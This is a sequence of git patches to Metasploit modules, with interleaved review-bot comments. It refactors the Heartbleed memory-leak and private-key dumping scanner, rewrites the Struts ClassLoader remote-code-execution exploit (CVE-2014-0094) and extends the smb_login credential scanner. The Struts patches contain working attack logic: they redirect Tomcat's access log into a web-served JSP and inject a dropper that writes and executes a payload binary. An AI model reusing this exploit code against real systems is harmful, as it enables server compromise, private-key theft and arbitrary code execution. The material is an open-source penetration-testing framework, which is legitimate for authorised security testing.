@@ -338,33 +463,36 @@ class Metasploit3 < Msf::Auxiliary # try to get the TLS error if type == ALERT_RECORD_TYPE - res = sock.get_once(len, response_timeout) + res = get_data(len) alert_unp = res.unpack('CC') alert_level = alert_unp[0] alert_desc = alert_unp[1] - msg = "Unknown error" + # http://tools.ietf.org/html/rfc5246#section-7.2 case alert_desc when 0x46 - msg = "Protocol error. Looks like the chosen protocol is not supported." + msg = 'Protocol error. Looks like the chosen protocol is not supported.' + else + msg = 'Unknown error' end vprint_error("#{peer} - #{msg}") disconnect return end - unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLS_VERSION']] - vprint_error("#{peer} - Unexpected Heartbeat response") + unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[tls_version] + vprint_error("#{peer} - Unexpected Heartbeat response header (#{to_hex_string(hdr)})") disconnect return end - heartbeat_data = sock.get(heartbeat_length) # Read the magic length... + heartbeat_data = get_data(heartbeat_length) vprint_status("#{peer} - Heartbeat response, #{heartbeat_data.length} bytes") disconnect heartbeat_data end + # Stores received data def loot_and_report(heartbeat_data) unless heartbeat_data @@ -382,19 +510,19 @@ class Metasploit3 < Msf::Auxiliary }) if action.name == 'DUMP' # Check mode, dump if requested. - pattern = datastore['DUMPFILTER'] + pattern = dumpfilter if pattern match_data = heartbeat_data.scan(pattern).join else match_data = heartbeat_data end path = store_loot( - "openssl.heartbleed.server", - "application/octet-stream", + 'openssl.heartbleed.server', + 'application/octet-stream', rhost, match_data, nil, - "OpenSSL Heartbleed server memory" + 'OpenSSL Heartbleed server memory' ) print_status("#{peer} - Heartbeat data stored in #{path}") end 
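Review bot: `get_data(heartbeat_length)` returns an empty string, not nil, when nothing arrives, so the `unless heartbeat_data` guard at the top of `loot_and_report` no longer catches an empty reply. A host that sends only a heartbeat record header would pass that guard. The rest of `loot_and_report` is only partly visible here, but if it records a finding for any non-nil value, this produces a false positive in scan results. Ending `bleed` with `heartbeat_data.empty? ? nil : heartbeat_data` keeps the guard meaningful.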
@@ -403,12 +531,12 @@ class Metasploit3 < Msf::Auxiliary end - def getkeys() - unless datastore['TLS_CALLBACK'] == 'None' - print_error('TLS callbacks currently unsupported for keydumping action') #TODO - return - end + # + # Keydumoing helper methods + # + # Tries to retreive the private key + def getkeys print_status("#{peer} - Scanning for private keys") count = 0 @@ -423,13 +551,16 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{peer} - e: #{e}") print_status("#{peer} - #{Time.now.getutc} - Starting.") - datastore['MAX_KEYTRIES'].times { + max_keytries.times { # Loop up to MAX_KEYTRIES times, looking for keys - if count % datastore['STATUS_EVERY'] == 0 + if count % status_every == 0 print_status("#{peer} - #{Time.now.getutc} - Attempt #{count}...") end - p, q = get_factors(bleed, n) # Try to find factors in mem + bleedresult = bleed + return unless bleedresult + + p, q = get_factors(bleedresult, n) # Try to find factors in mem unless p.nil? || q.nil? key = key_from_pqe(p, q, e) 
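Review bot: Two comments added in the first hunk are misspelled: `# Keydumoing helper methods` should read `# Keydumping helper methods`, and `# Tries to retreive the private key` should read `# Tries to retrieve the private key`. The banner-comment layout matches the other section headers added by this commit, so only the spelling needs to change.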
@@ -437,75 +568,32 @@ class Metasploit3 < Msf::Auxiliary print_status(key.export) path = store_loot( - "openssl.heartbleed.server", - "text/plain", + 'openssl.heartbleed.server', + 'text/plain', rhost, key.export, nil, - "OpenSSL Heartbleed Private Key" + 'OpenSSL Heartbleed Private Key' ) print_status("#{peer} - Private key stored in #{path}") return end count += 1 } - print_error("#{peer} - Private key not found. You can try to increase MAX_KEYTRIES.") + print_error("#{peer} - Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.") end - def heartbeat(length) - payload = "\x01" # Heartbeat Message Type: Request (1) - payload << [length].pack("n") # Payload Length: 65535 - - ssl_record(HEARTBEAT_RECORD_TYPE, payload) - end - - def client_hello - # Use current day for TLS time - time_temp = Time.now - time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i - - hello_data = [TLS_VERSION[datastore['TLS_VERSION']]].pack("n") # Version TLS - hello_data << [time_epoch].pack("N") # Time in epoch format - hello_data << Rex::Text.rand_text(28) # Random - hello_data << "\x00" # Session ID length - hello_data << [CIPHER_SUITES.length * 2].pack("n") # Cipher Suites length (102) - hello_data << CIPHER_SUITES.pack("n*") # Cipher Suites - hello_data << "\x01" # Compression methods length (1) - hello_data << "\x00" # Compression methods: null - - hello_data_extensions = "\x00\x0f" # Extension type (Heartbeat) - hello_data_extensions << "\x00\x01" # Extension length - hello_data_extensions << "\x01" # Extension data - - hello_data << [hello_data_extensions.length].pack("n") - hello_data << hello_data_extensions - - data = "\x01\x00" # Handshake Type: Client Hello (1) - data << [hello_data.length].pack("n") # Length - data << hello_data - - ssl_record(HANDSHAKE_RECORD_TYPE, data) - end - - def ssl_record(type, data) - record = [type, TLS_VERSION[datastore['TLS_VERSION']], data.length].pack('Cnn') - record << data - end - - 
def get_ne() - # Fetch rhost's cert, return public key values - connect(true, {"SSL" => true}) #Force SSL - cert = OpenSSL::X509::Certificate.new(sock.peer_cert) - disconnect - - unless cert + # Returns the N and E params from the public server certificate + def get_ne + unless @cert print_error("#{peer} - No certificate found") return end - return cert.public_key.params["n"], cert.public_key.params["e"] + return @cert.public_key.params['n'], @cert.public_key.params['e'] end + # Tries to find pieces of the private key in the provided data def get_factors(data, n) # Walk through data looking for factors of n psize = n.num_bits / 8 / 2 @@ -523,40 +611,11 @@ class Metasploit3 < Msf::Auxiliary return p, q end end - } + } return nil, nil end - def establish_connect - connect - - unless datastore['TLS_CALLBACK'] == 'None' - vprint_status("#{peer} - Trying to start SSL via #{datastore['TLS_CALLBACK']}") - res = self.send(TLS_CALLBACKS[datastore['TLS_CALLBACK']]) - if res.nil? - vprint_error("#{peer} - STARTTLS failed...") - return nil - end - end - - vprint_status("#{peer} - Sending Client Hello...") - sock.put(client_hello) - - server_hello = sock.get(response_timeout) - unless server_hello - vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...") - disconnect - return nil - end - - unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE - vprint_error("#{peer} - Server Hello Not Found") - return nil - end - - true - end - + # Generates the private key from the P, Q and E values def key_from_pqe(p, q, e) # Returns an RSA Private Key from Factors key = OpenSSL::PKey::RSA.new() 
@@ -577,5 +636,170 @@ class Metasploit3 < Msf::Auxiliary return key end -end + # + # SSL/TLS packet methods + # + # Creates and returns a new SSL record with the provided data + def ssl_record(type, data) + record = [type, TLS_VERSION[tls_version], data.length].pack('Cnn') + record << data + end + + # generates a CLIENT_HELLO ssl/tls packet + def client_hello + # Use current day for TLS time + time_temp = Time.now + time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i + + hello_data = [TLS_VERSION[tls_version]].pack('n') # Version TLS + hello_data << [time_epoch].pack('N') # Time in epoch format + hello_data << Rex::Text.rand_text(28) # Random + hello_data << "\x00" # Session ID length + hello_data << [CIPHER_SUITES.length * 2].pack('n') # Cipher Suites length (102) + hello_data << CIPHER_SUITES.pack('n*') # Cipher Suites + hello_data << "\x01" # Compression methods length (1) + hello_data << "\x00" # Compression methods: null + + hello_data_extensions = "\x00\x0f" # Extension type (Heartbeat) + hello_data_extensions << "\x00\x01" # Extension length + hello_data_extensions << "\x01" # Extension data + + hello_data << [hello_data_extensions.length].pack('n') + hello_data << hello_data_extensions + + data = "\x01\x00" # Handshake Type: Client Hello (1) + data << [hello_data.length].pack('n') # Length + data << hello_data + + ssl_record(HANDSHAKE_RECORD_TYPE, data) + end + + # Parse SSL header + def parse_ssl_record(data) + ssl_records = [] + remaining_data = data + ssl_record_counter = 0 + while remaining_data && remaining_data.length > 0 + ssl_record_counter += 1 + ssl_unpacked = remaining_data.unpack('CH4n') + return nil if ssl_unpacked.nil? 
or ssl_unpacked.length < 3 + ssl_type = ssl_unpacked[0] + ssl_version = ssl_unpacked[1] + ssl_len = ssl_unpacked[2] + vprint_debug("SSL record ##{ssl_record_counter}:") + vprint_debug("\tType: #{ssl_type}") + vprint_debug("\tVersion: 0x#{ssl_version}") + vprint_debug("\tLength: #{ssl_len}") + if ssl_type != HANDSHAKE_RECORD_TYPE + vprint_debug("\tWrong Record Type! (#{ssl_type})") + else + ssl_data = remaining_data[5, ssl_len] + handshakes = parse_handshakes(ssl_data) + ssl_records << { + :type => ssl_type, + :version => ssl_version, + :length => ssl_len, + :data => handshakes + } + end + remaining_data = remaining_data[(ssl_len + 5)..-1] + end + + ssl_records + end + + # Parse Handshake data returned from servers + def parse_handshakes(data) + # Can contain multiple handshakes + remaining_data = data + handshakes = [] + handshake_count = 0 + while remaining_data && remaining_data.length > 0 + hs_unpacked = remaining_data.unpack('CCn') + next if hs_unpacked.nil? or hs_unpacked.length < 3 + hs_type = hs_unpacked[0] + hs_len_pad = hs_unpacked[1] + hs_len = hs_unpacked[2] + hs_data = remaining_data[4, hs_len] + handshake_count += 1 + vprint_debug("\tHandshake ##{handshake_count}:") + vprint_debug("\t\tLength: #{hs_len}") + + handshake_parsed = nil + case hs_type + when HANDSHAKE_SERVER_HELLO_TYPE + vprint_debug("\t\tType: Server Hello (#{hs_type})") + handshake_parsed = parse_server_hello(hs_data) + when HANDSHAKE_CERTIFICATE_TYPE + vprint_debug("\t\tType: Certificate Data (#{hs_type})") + handshake_parsed = parse_certificate_data(hs_data) + when HANDSHAKE_KEY_EXCHANGE_TYPE + vprint_debug("\t\tType: Server Key Exchange (#{hs_type})") + # handshake_parsed = parse_server_key_exchange(hs_data) + when HANDSHAKE_SERVER_HELLO_DONE_TYPE + vprint_debug("\t\tType: Server Hello Done (#{hs_type})") + else + vprint_debug("\t\tType: Handshake type #{hs_type} not implemented") + end + + handshakes << { + :type => hs_type, + :len => hs_len, + :data => handshake_parsed + } + 
remaining_data = remaining_data[(hs_len + 4)..-1] + end + + handshakes + end + + # Parse Server Hello message + def parse_server_hello(data) + version = data.unpack('H4')[0] + vprint_debug("\t\tServer Hello Version: 0x#{version}") + random = data[2,32].unpack('H*')[0] + vprint_debug("\t\tServer Hello random data: #{random}") + session_id_length = data[34,1].unpack('C')[0] + vprint_debug("\t\tServer Hello Session ID length: #{session_id_length}") + session_id = data[35,session_id_length].unpack('H*')[0] + vprint_debug("\t\tServer Hello Session ID: #{session_id}") + # TODO Read the rest of the server hello (respect message length) + + # TODO: return hash with data + true + end + + # Parse certificate data + def parse_certificate_data(data) + # get certificate data length + unpacked = data.unpack('Cn') + cert_len_padding = unpacked[0] + cert_len = unpacked[1] + vprint_debug("\t\tCertificates length: #{cert_len}") + # contains multiple certs + already_read = 3 + cert_counter = 0 + while already_read < cert_len + start = already_read + cert_counter += 1 + # get single certificate length + single_cert_unpacked = data[start, 3].unpack('Cn') + single_cert_len_padding = single_cert_unpacked[0] + single_cert_len = single_cert_unpacked[1] + vprint_debug("\t\tCertificate ##{cert_counter}:") + vprint_debug("\t\t\tCertificate ##{cert_counter}: Length: #{single_cert_len}") + certificate_data = data[(start + 3), single_cert_len] + cert = OpenSSL::X509::Certificate.new(certificate_data) + # First received certificate is the one from the server + @cert = cert if @cert.nil? + #vprint_debug("Got certificate: #{cert.to_text}") + vprint_debug("\t\t\tCertificate ##{cert_counter}: #{cert.inspect}") + already_read = already_read + single_cert_len + 3 + end + + # TODO: return hash with data + true + end + +end From 140c8587e75fc135f98bbe7e79df8104e2ff8332 Mon Sep 17 00:00:00 2001 
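Review bot: The length guards in `parse_ssl_record` and `parse_handshakes` cannot fire, because `String#unpack` returns one element per directive and pads with nil, so `length < 3` is never true and a truncated record reaches `ssl_len + 5` or `remaining_data[4, hs_len]` with a nil length. These methods parse bytes chosen by the remote server, so the byte count should be checked before unpacking: `return nil if remaining_data.length < 5` in `parse_ssl_record` and `break if remaining_data.length < 4` in `parse_handshakes` (a `next` there would spin, since `remaining_data` is not advanced). `parse_server_hello` and `parse_certificate_data` also slice at fixed offsets without checking the data length, and `OpenSSL::X509::Certificate.new` is not rescued, so one malformed certificate aborts parsing with an exception.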
From: jvazquez-r7 Date: Thu, 1 May 2014 15:24:10 -0500 Subject: [PATCH 228/853] Fix metadata --- .../http/struts_code_exec_classloader.rb | 43 +++++++++---------- 1 file changed, 21 insertions(+), 22 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index ad279627f4..df8dc3fdd7 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -32,41 +32,40 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2014-0094'], - [ 'CVE', '2014-0112'], - [ 'URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'], - [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'] + ['CVE', '2014-0094'], + ['CVE', '2014-0112'], + ['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'], + ['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'] ], - 'Platform' => %w{ linux win }, - 'Privileged' => true, + 'Platform' => %w{ linux win }, 'Targets' => [ - ['Windows Universal', + ['Java', + { + 'Arch' => ARCH_JAVA, + 'Platform' => %w{ linux win } + }, + ], + ['Linux', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ['Windows', { - 'Arch' => ARCH_X86, + 'Arch' => ARCH_X86, 'Platform' => 'win' } - ], - ['Linux Universal', - { - 'Arch' => ARCH_X86, - 'Platform' => 'linux' - } - ], - ['Java Universal', - { - 'Arch' => ARCH_JAVA, - 'Platform' => ['win','linux'] - }, ] ], 'DisclosureDate' => 'Mar 06 2014', - 'DefaultTarget' => 2)) + 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8080), - OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/hello_world/hello.action"]) + OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]) ], self.class) end 
From 195005dd832e1a796565753bc2351d706d0baa62 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 15:25:55 -0500 Subject: [PATCH 229/853] Do minor style changes --- .../multi/http/struts_code_exec_classloader.rb | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index df8dc3fdd7..82322a7113 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -72,20 +72,18 @@ class Metasploit3 < Msf::Exploit::Remote def exec_cmd(uri, cmd = "") resp = send_request_cgi({ - 'uri' => uri+cmd, - 'version' => '1.1', - 'method' => 'GET', + 'uri' => uri+cmd, + 'version' => '1.1', + 'method' => 'GET', }) return resp end - - def is_log_flushed(resp, content) - return (resp.headers["Content-Length"] != "0") && (resp.body =~ /#{content}/) + def is_log_flushed?(resp, content) + return resp.headers["Content-Length"] != "0" && resp.body =~ /#{content}/ end - def exploit prefix_jsp = rand_text_alphanumeric(3+rand(3)) @@ -181,7 +179,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::TimeoutExpired, "Not received response") if res.nil? # Success if the server has flushed all the sent commands to the jsp file - if res.code == 200 && is_log_flushed(res, payload_file) + if res.code == 200 && is_log_flushed?(res, payload_file) flushed = true break end From b7ecf829d3c28d7f63b7fa8a8db91d907bb5d200 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 16:39:53 -0500 Subject: [PATCH 230/853] Do first refactor --- .../http/struts_code_exec_classloader.rb | 103 +++++++++++------- 1 file changed, 64 insertions(+), 39 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 82322a7113..1aa80f25fb 100644 
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE @@ -66,30 +66,45 @@ class Metasploit3 < Msf::Exploit::Remote [ Opt::RPORT(8080), OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]) - ], self.class) + ], self.class) end + def jsp_dropper(file, exe) + dropper = <<-eos +<%@ page import=\"java.io.FileOutputStream\" %> +<%@ page import=\"sun.misc.BASE64Decoder\" %> +<%@ page import=\"java.io.File\" %> +<% FileOutputStream oFile = new FileOutputStream(\"#{file}\", false); %> +<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(exe)}\")); %> +<% oFile.flush(); %> +<% oFile.close(); %> +<% File f = new File(\"#{file}\"); %> +<% f.setExecutable(true); %> +<% Runtime.getRuntime().exec(\"./#{file}\"); %> + eos + + dropper + end def exec_cmd(uri, cmd = "") - resp = send_request_cgi({ + res = send_request_cgi({ 'uri' => uri+cmd, 'version' => '1.1', 'method' => 'GET', }) - return resp + res end def is_log_flushed?(resp, content) return resp.headers["Content-Length"] != "0" && resp.body =~ /#{content}/ end - def exploit - + def modify_class_loader prefix_jsp = rand_text_alphanumeric(3+rand(3)) date_format = rand_text_numeric(1+rand(4)) - vprint_status("#{peer} - Modifying class loader") + print_status("#{peer} - Modifying class loader") # Modifies classLoader parameters exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") # Directory where log file os going to be created 
@@ -97,13 +112,13 @@ class Metasploit3 < Msf::Exploit::Remote exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") # File extension exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") # second part of filename: "prefix+fileDateFormat.suffix" - jsp_file = prefix_jsp - jsp_file << date_format - jsp_file << ".jsp" + @jsp_file = prefix_jsp + @jsp_file << date_format + @jsp_file << ".jsp" # Wait till the log is created uri = "/" - uri << jsp_file + uri << @jsp_file created = false 
@@ -117,52 +132,59 @@ class Metasploit3 < Msf::Exploit::Remote res = exec_cmd(uri) # Failure. The request timed out or the server went away. - fail_with(Failure::TimeoutExpired, "Not received response") if res.nil? + fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil? # Success if the server has flushed all the sent commands to the jsp file if res.code == 200 - vprint_good("#{peer} - created file at http://#{peer}/#{jsp_file}") + print_good("#{peer} - Log file created file at http://#{peer}/#{@jsp_file}") created = true break end end - fail_with(Failure::TimeoutExpired, "No log file was created") unless created + fail_with(Failure::TimeoutExpired, "#{peer} - No log file was created") unless created + end + # Fix the JSP payload to make it valid once is dropped + # to the log file + def fix(jsp) + output = "" + jsp.each_line do |l| + if l =~ /<%.*%>/ + output << l + elsif l =~ /<%/ + next + elsif l.chomp.empty? + next + else + output << "<% #{l.chomp} %>" + end + end + output + end + + def execute_jsp if target['Arch'] == ARCH_JAVA - payload_exe = payload.encoded + jsp = fix(payload.encoded) + register_files_for_cleanup("#{@jsp_file}") else payload_exe = generate_payload_exe + payload_file = rand_text_alphanumeric(4 + rand(4)) + jsp = jsp_dropper(payload_file, payload_exe) + register_files_for_cleanup("#{payload_file}", "#{@jsp_file}") end - payload_file = rand_text_alphanumeric(4+rand(4)) - payload_file << ".jsp" if (target['Arch'] == ARCH_JAVA) - register_files_for_cleanup("#{payload_file}", "#{jsp_file}") - # Inexistent URI that logs on previously created log file (with ".jsp" suffix) - uri = String.new(datastore['TARGETURI']) - uri << payload_file - - vprint_status("#{peer} - Dumping payload into the logfile") + hint = rand_text_alpha(4 + rand(4)) + print_status("#{peer} - Dumping payload into the logfile") # Commands to be logged - exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>") - exec_cmd(uri, "<%@ page 
import=\"sun.misc.BASE64Decoder\" %>") - exec_cmd(uri, "<%@ page import=\"java.io.File\" %>") - - exec_cmd(uri, "<% FileOutputStream oFile = new FileOutputStream(\"#{payload_file}\", false); %>") - exec_cmd(uri, "<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(payload_exe)}\")); %>") - exec_cmd(uri, "<% oFile.flush(); %>") - exec_cmd(uri, "<% oFile.close(); %>") - - if target['Arch'] != ARCH_JAVA - exec_cmd(uri, "<% File f = new File(\"#{payload_file}\"); %>") - exec_cmd(uri, "<% f.setExecutable(true); %>") - exec_cmd(uri, "<% Runtime.getRuntime().exec(\"./#{payload_file}\"); %>") + jsp.each_line do |l| + exec_cmd(hint, l.chomp) end uri = "/" - uri << jsp_file + uri << @jsp_file flushed = false @@ -179,16 +201,19 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::TimeoutExpired, "Not received response") if res.nil? # Success if the server has flushed all the sent commands to the jsp file - if res.code == 200 && is_log_flushed?(res, payload_file) + if res.code == 200 && is_log_flushed?(res, hint) flushed = true break end end fail_with(Failure::TimeoutExpired, "Log not flushed on time") unless flushed + end - exec_cmd("/#{payload_file}") if (target['Arch'] == ARCH_JAVA) + def exploit + modify_class_loader + execute_jsp end end From 3dd3ceb3a91e20d808fb71fb1d1d283347354f8b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 18:04:37 -0500 Subject: [PATCH 231/853] Refactor code --- .../http/struts_code_exec_classloader.rb | 150 ++++++++++-------- 1 file changed, 80 insertions(+), 70 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 1aa80f25fb..d44e390350 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb 
@@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking + Rank = ManualRanking # It's going to manipulate the Class Loader include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE @@ -38,6 +38,11 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'] ], 'Platform' => %w{ linux win }, + 'Payload' => + { + 'Space' => 5000, + 'DisableNops' => true + }, 'Targets' => [ ['Java', @@ -60,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote ] ], 'DisclosureDate' => 'Mar 06 2014', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 1)) register_options( [ @@ -86,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote dropper end - def exec_cmd(uri, cmd = "") + def dump_line(uri, cmd = "") res = send_request_cgi({ 'uri' => uri+cmd, 'version' => '1.1', 
@@ -96,53 +101,45 @@ class Metasploit3 < Msf::Exploit::Remote res end - def is_log_flushed?(resp, content) - return resp.headers["Content-Length"] != "0" && resp.body =~ /#{content}/ + def modify_class_loader(opts) + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s), + 'version' => '1.1', + 'method' => 'GET', + 'vars_get' => { + "class['classLoader'].resources.context.parent.pipeline.first.directory" => opts[:directory], + "class['classLoader'].resources.context.parent.pipeline.first.prefix" => opts[:prefix], + "class['classLoader'].resources.context.parent.pipeline.first.suffix" => opts[:suffix], + "class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format] + } + }) + + res end - def modify_class_loader - prefix_jsp = rand_text_alphanumeric(3+rand(3)) - date_format = rand_text_numeric(1+rand(4)) + def check_log_file(hint) + uri = normalize_uri("/", @jsp_file) - print_status("#{peer} - Modifying class loader") - - # Modifies classLoader parameters - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") # Directory where log file os going to be created - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") # Filename - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") # File extension - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") # second part of filename: "prefix+fileDateFormat.suffix" - - @jsp_file = prefix_jsp - @jsp_file << date_format - @jsp_file << ".jsp" - - # Wait till the log is created - uri = "/" - uri << @jsp_file - - created = false - - print_status("#{peer} - Waiting for the server to create the logfile") + print_status("#{peer} - Waiting for the server to flush the logfile") 10.times do |x| select(nil, nil, 
nil, 2) # Now make a request to trigger payload vprint_status("#{peer} - Countdown #{10-x}...") - res = exec_cmd(uri) + res = dump_line(uri) # Failure. The request timed out or the server went away. fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil? # Success if the server has flushed all the sent commands to the jsp file - if res.code == 200 - print_good("#{peer} - Log file created file at http://#{peer}/#{@jsp_file}") - created = true - break + if res.code == 200 && res.body && res.body.to_s =~ /#{hint}/ + print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}") + return true end end - fail_with(Failure::TimeoutExpired, "#{peer} - No log file was created") unless created + false end # Fix the JSP payload to make it valid once is dropped 
@@ -163,57 +160,70 @@ class Metasploit3 < Msf::Exploit::Remote output end - def execute_jsp + def create_jsp if target['Arch'] == ARCH_JAVA jsp = fix(payload.encoded) - register_files_for_cleanup("#{@jsp_file}") else payload_exe = generate_payload_exe payload_file = rand_text_alphanumeric(4 + rand(4)) jsp = jsp_dropper(payload_file, payload_exe) - register_files_for_cleanup("#{payload_file}", "#{@jsp_file}") + register_files_for_cleanup(payload_file) end - # Inexistent URI that logs on previously created log file (with ".jsp" suffix) - hint = rand_text_alpha(4 + rand(4)) + jsp + end - print_status("#{peer} - Dumping payload into the logfile") - # Commands to be logged + def exploit + prefix_jsp = rand_text_alphanumeric(3+rand(3)) + date_format = rand_text_numeric(1+rand(4)) + @jsp_file = prefix_jsp + date_format + ".jsp" + + # Modify the Class Loader + + print_status("#{peer} - Modifying Class Loader...") + properties = { + :directory => 'webapps/ROOT', + :prefix => prefix_jsp, + :suffix => '.jsp', + :file_date_format => date_format + } + res = modify_class_loader(properties) + unless res + fail_with(Failure::TimeoutExpired, "#{peer} - No answer") + end + + # Check if the log file exists and hass been flushed + + if check_log_file(normalize_uri(target_uri.to_s)) + register_files_for_cleanup(@jsp_file) + else + fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed") + end + + # Prepare the JSP + print_status("#{peer} - Generating JSP...") + jsp = create_jsp + + # Dump the JSP to the log file + print_status("#{peer} - Dumping JSP into the logfile...") + random_request = rand_text_alphanumeric(3 + rand(3)) jsp.each_line do |l| - exec_cmd(hint, l.chomp) - end - - uri = "/" - uri << @jsp_file - - flushed = false - - print_status("#{peer} - Waiting for the server to flush the logfile") - - 10.times do |x| - select(nil, nil, nil, 2) - - # Now make a request to trigger payload - vprint_status("#{peer} - Countdown #{10-x}...") - res = exec_cmd(uri) - - # 
Failure. The request timed out or the server went away. - fail_with(Failure::TimeoutExpired, "Not received response") if res.nil? - - # Success if the server has flushed all the sent commands to the jsp file - if res.code == 200 && is_log_flushed?(res, hint) - flushed = true - break + unless dump_line(random_request, l.chomp) + fail_with(Failure::Unknown, "#{peer} - Missed answer while dumping JSP to logfile...") end end - fail_with(Failure::TimeoutExpired, "Log not flushed on time") unless flushed - end + # Check log file... enjoy shell! + check_log_file(random_request) - - def exploit - modify_class_loader - execute_jsp + # No matter what happened, try to 'restore' the Class Loader + properties = { + :directory => '', + :prefix => '', + :suffix => '', + :file_date_format => '' + } + modify_class_loader(properties) end end From b2eeaef47535e163c9d669a093dc657dfe3b1c6c Mon Sep 17 00:00:00 2001 
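Review bot: The Class Loader reset at the end of `exploit` is skipped whenever an earlier `fail_with` fires (it presumably raises), so a failed run leaves the server's log directory, prefix, suffix and date format changed. Placing the reset under an `ensure` clause of the method would make it run on every exit path. The reset also writes empty strings rather than the values the server had before, so the original logging configuration is not recovered; the module description should state this so the system owner knows the settings must be restored after a test. The added comment `# Check if the log file exists and hass been flushed` has a typo ("hass").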
From: Tom Sellers Date: Fri, 2 May 2014 06:16:21 -0500 Subject: [PATCH 232/853] Add admin check to smb_login The attached updates changes smb_login to detect if the newly discovered user is an administrator. It is based on code from Brandon McCann "zeknox" submitted in PR #1373, the associated changes, and the newer PR #2656. The changes should correct a few issues with PR #1373 and #2656 and address Redmine bug #8773. Specifically it: - Fixes the admin detection code by using simple.disconnect() instead of disconnect() - Adds support for detecting if the remote host will allow connects using any domain name when one of the new status codes is returned - Dealt with the issue in PR #2656 where the username was prefixed with a '\' Verification Be connected to a database Run this against a machine with a known user and admin user See that the admin user is reported correctly See that the non-admin user is reported correctly Check the output of creds Select a target that requires a domain in order to authenticate In the stored credentials, with CHECK_ADMIN enabled, see that the domain name is, in fact, preserved in the reporting To validate that the remote domain ignores domain value use the following command from a windows system: net use \\\admin$ /user:\ --- modules/auxiliary/scanner/smb/smb_login.rb | 41 +++++++++++++++++++--- 1 file changed, 37 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 0d7daddb69..979b8817c3 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -32,7 +32,9 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'tebo ', # Original - 'Ben Campbell' # Refactoring + 'Ben Campbell', # Refactoring + 'Brandon McCann "zeknox" ', # admin check + 'Tom Sellers 